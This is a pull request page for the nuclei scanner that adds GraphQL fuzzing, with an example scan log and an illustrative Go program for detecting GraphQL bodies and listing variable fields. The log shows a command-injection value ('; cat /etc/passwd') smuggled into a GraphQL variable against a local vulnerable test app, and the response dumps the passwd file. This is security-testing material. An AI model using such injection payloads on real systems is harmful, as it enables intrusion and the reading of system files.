nuclei
feat: added initial graphql fuzzing support
Proposed changes
- [ ] Get param graphql fuzzing support
- [x] Improve validation for graphql detection
- [ ] Introspection linking (file, url, automatic)
- [x] Test cases
Checklist
- [ ] Pull request is created against the dev branch
- [ ] All checks passed (lint, unit/integration/regression tests etc.) with my changes
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] I have added necessary documentation (if appropriate)
Example run:

```
[INF] [cmdi-blind-oast-polyglot] Fuzz points for http://localhost:5013/graphql [POST]
{
  "body": {
    "host": "example.com",
    "path": "/robots.txt",
    "port": "80",
    "scheme": "http"
  }
}
[INF] [cmdi-blind-oast-polyglot] Dumped HTTP request for http://localhost:5013/graphql
POST /graphql HTTP/1.1
Host: localhost:5013
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Length: 291
Accept: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Content-Type: application/json
Cookie: env=graphiql:disable
Origin: http://localhost:5013
Priority: u=0
Referer: http://localhost:5013/import_paste
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"query":"mutation ImportPaste($host: String!, $port: Int!, $path: String!, $scheme: String!) {\n importPaste(host: $host, port: $port, path: $path, scheme: $scheme) {\n result\n }\n}\n","variables":{"scheme":"http","host":"example.com","port":80,"path":"/robots.txt; cat /etc/passwd"}}
[VER] [cmdi-blind-oast-polyglot] Sent HTTP request to http://localhost:5013/graphql
[DBG] [cmdi-blind-oast-polyglot] Dumped HTTP response http://localhost:5013/graphql
HTTP/1.1 200 OK
Content-Length: 2130
Content-Type: application/json
Date: Thu, 10 Oct 2024 10:00:11 GMT

{"data":{"importPaste":{"result":"<!doctype html>\n<html>\n<head>\n <title>Example Domain</title>\n\n <meta charset=\"utf-8\" />\n <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n <style type=\"text/css\">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: -apple-system, system-ui, BlinkMacSystemFont, \"Segoe UI\", \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 2em;\n background-color: #fdfdff;\n border-radius: 0.5em;\n box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n div {\n margin: 0 auto;\n width: auto;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.</p>\n <p><a href=\"https://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\nroot:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/mail:/sbin/nologin\nnews:x:9:13:news:/usr/lib/news:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin\ncron:x:16:16:cron:/var/spool/cron:/sbin/nologin\nftp:x:21:21::/var/lib/ftp:/sbin/nologin\nsshd:x:22:22:sshd:/dev/null:/sbin/nologin\ngames:x:35:35:games:/usr/games:/sbin/nologin\nntp:x:123:123:NTP:/var/empty:/sbin/nologin\nguest:x:405:100:guest:/dev/null:/sbin/nologin\nnobody:x:65534:65534:nobody:/:/sbin/nologin\ndvga:x:1000:1000:Linux User,,,:/home/dvga:/bin/sh\n"}}}
[cmdi-blind-oast-polyglot:regex-1] [http] [high] http://localhost:5013/graphql [body:path] [POST]
```
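The two pieces of the feature that the run above exercises are GraphQL detection (deciding that a JSON body is a GraphQL operation rather than some other JSON API call) and fuzz-point enumeration (listing the `variables` leaves such as `host`, `path`, `port`, `scheme` that the `[INF] Fuzz points` dump prints). The program below is an added, stand-alone illustration of that logic, not code from nuclei or from this pull request; the function names `IsGraphQL` and `FuzzPoints`, the keyword-based detection rule and the `SampleBody` constant are all assumptions of this example. It generalises slightly beyond the page by also flattening nested objects and lists into dotted key paths, which the dump does not show. The same enumeration is useful on the defensive side, for instance to decide which GraphQL variable fields a gateway should log or validate.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"sort"
	"strconv"
	"strings"
)

// graphQLRequest is the JSON envelope a GraphQL client posts:
// a "query" document, an optional "operationName" and a "variables" object.
type graphQLRequest struct {
	Query         string                 `json:"query"`
	OperationName string                 `json:"operationName"`
	Variables     map[string]interface{} `json:"variables"`
}

// opPattern accepts a document that starts with an operation keyword
// (followed by a word boundary, so "queryX" is rejected) or with an
// anonymous selection set "{ ... }". This rule is an assumption of the example.
var opPattern = regexp.MustCompile(`^(?:query|mutation|subscription|fragment)\b|^\{`)

// IsGraphQL reports whether body looks like a GraphQL request: it must be
// valid JSON carrying a non-empty "query" string that opPattern accepts.
// A body such as {"query":"SELECT 1"} is therefore not mistaken for GraphQL.
func IsGraphQL(body []byte) bool {
	var req graphQLRequest
	if err := json.Unmarshal(body, &req); err != nil {
		return false
	}
	return opPattern.MatchString(strings.TrimSpace(req.Query))
}

// FuzzPoints flattens the "variables" object into key path -> value text,
// e.g. "host" -> "example.com", "port" -> "80", "filter.tags.0" -> "x".
// Only scalar leaves are returned; these are the positions that carry
// user-controlled input, whether a fuzzer mutates them or a gateway logs them.
func FuzzPoints(body []byte) (map[string]string, error) {
	var req graphQLRequest
	if err := json.Unmarshal(body, &req); err != nil {
		return nil, err
	}
	points := map[string]string{}
	flatten("", req.Variables, points)
	return points, nil
}

// flatten walks nested maps and slices, recording each scalar leaf under a
// dotted path. JSON numbers arrive as float64, so 80 prints as "80".
func flatten(prefix string, v interface{}, out map[string]string) {
	switch t := v.(type) {
	case map[string]interface{}:
		for k, child := range t {
			flatten(joinPath(prefix, k), child, out)
		}
	case []interface{}:
		for i, child := range t {
			flatten(joinPath(prefix, strconv.Itoa(i)), child, out)
		}
	case nil:
		if prefix != "" {
			out[prefix] = "null"
		}
	default:
		out[prefix] = fmt.Sprint(t)
	}
}

func joinPath(prefix, key string) string {
	if prefix == "" {
		return key
	}
	return prefix + "." + key
}

// SampleBody is a constructed request body modelled on the mutation in the
// example run, with a benign "path" value.
const SampleBody = `{"query":"mutation ImportPaste($host: String!, $port: Int!, $path: String!, $scheme: String!) {\n importPaste(host: $host, port: $port, path: $path, scheme: $scheme) {\n result\n }\n}\n","variables":{"scheme":"http","host":"example.com","port":80,"path":"/robots.txt"}}`

func main() {
	body := []byte(SampleBody)
	fmt.Println("graphql:", IsGraphQL(body))
	points, err := FuzzPoints(body)
	if err != nil {
		panic(err)
	}
	keys := make([]string, 0, len(points))
	for k := range points {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	for _, k := range keys {
		fmt.Printf("  %s = %q\n", k, points[k])
	}
}
```

Running the block prints the four fuzz points of the sample body in sorted order; a login body like `{"username":"a","password":"b"}` is rejected by `IsGraphQL` because it has no `query` document at all.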